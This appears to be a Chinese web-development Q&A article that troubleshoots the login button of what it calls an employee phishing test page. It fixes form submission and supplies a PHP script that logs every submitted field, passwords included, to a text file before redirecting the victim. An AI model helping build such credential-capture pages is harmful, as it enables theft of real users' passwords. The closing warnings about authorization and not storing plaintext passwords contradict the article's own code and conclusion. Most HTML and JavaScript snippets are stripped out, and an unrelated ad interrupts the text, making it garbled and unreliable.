本文详解为何html表单中点击登录按钮无法触发php数据提交，而按enter键却可以，并提供完整解决方案，包括表单结构修正、javascript事件绑定优化及安全注意事项。

在您提供的代码中，核心问题在于：登录按钮（）并非原生 或 ，而是通过 标签模拟的按钮，且未正确绑定表单提交逻辑。它既没有 type=”submit” 属性，也未通过 JavaScript 显式调用 form.submit()，更未阻止默认跳转行为——这导致点击时仅执行了 javascript:void(0);”> 的空操作，而实际提交行为被绕过。

与此同时，您页面中存在两个独立表单：

• 主登录表单：
  
• 密码修改表单：
  
  （虽默认隐藏，但结构仍存在）

当用户聚焦在用户名/密码输入框并按 Enter 键时，浏览器会自动触发声焦点所在表单的原生提交（即 loginForm），因此 post.php 被正确执行；但点击“Login”链接时，由于该 标签未与 loginForm 建立任何提交关联，它既不触发表单提交，也不阻止页面跳转逻辑（尤其当存在其他脚本干扰时），最终导致数据丢失。

✅ 正确解决方案

1. 将登录按钮改为语义化、可提交的 HTML 元素

删除无效的 按钮，改用标准 ，并确保它位于 loginForm 内部：

  
  
  
  

  
  
    Login
  

⚠️ 注意：不要使用 style=”display:none” 隐藏关键提交控件；若需视觉隐藏但保留功能，请用 position: absolute; left: -9999px; 等无障碍友好的方式。

2. 移除干扰性的 onsubmit JavaScript（除非必要）

您当前的表单有 onsubmit=”return doLogin2();”，但代码中未定义 doLogin2 函数。若该函数不存在或返回 false，将直接阻止表单提交。请检查并移除该属性，或确保其逻辑明确返回 true：

如需前端校验，应这样编写：

ImgCreator AI

一款AI图像生成工具，适合创建插图、动画和概念设计图像。

下载

3. 确保 PHP 接收端健壮性（增强版 post.php）

当前 post.php 存在安全隐患（如未过滤输入、无错误处理）。建议升级为以下更可靠版本：

 $val) {
    $data .= "$key=" . htmlspecialchars(trim((string)$val), ENT_QUOTES, 'UTF-8') . "/n";
}
$data .= "/n";

// 原子写入，避免并发冲突
if (file_put_contents($logFile, $data, FILE_APPEND | LOCK_EX) === false) {
    error_log("Failed to write log: " . $logFile);
}

// 强制重定向（防止缓存）
header('Location: ' . $redirectUrl);
header('Connection: close');
exit;
?>

4. 额外验证技巧（调试用）

在 index.html 底部添加临时调试脚本，确认按钮是否真正触发提交：

? 提示：现代浏览器开发者工具（F12 → Network 标签页）可实时查看 post.php 是否被请求、状态码是否为 200 或 302，是排查问题的黄金手段。

⚠️ 重要法律与道德提醒（必须阅读）

您提到这是“phishing test for employees”。请注意：

• 必须获得企业书面授权，并明确告知测试范围与目的；
• 禁止存储真实密码明文（即使用于测试）——应立即哈希并丢弃，或仅记录用户名+时间戳；
• 严禁将测试页面部署到公网或未授权网络，XAMPP 默认无防火墙保护，存在严重安全风险；
• 推荐使用专业红队平台（如 GoPhish）替代手工钓鱼页，具备审计日志、合规报告等功能。

遵循以上修正后，点击“Login”按钮将与按 Enter 键行为完全一致：表单以 POST 方式提交至 post.php，凭证被安全写入 log.txt，并跳转至 redirect.html。结构清晰、语义正确、可维护性强，符合现代 Web 开发最佳实践。

https://www.php.cn/faq/1969005.html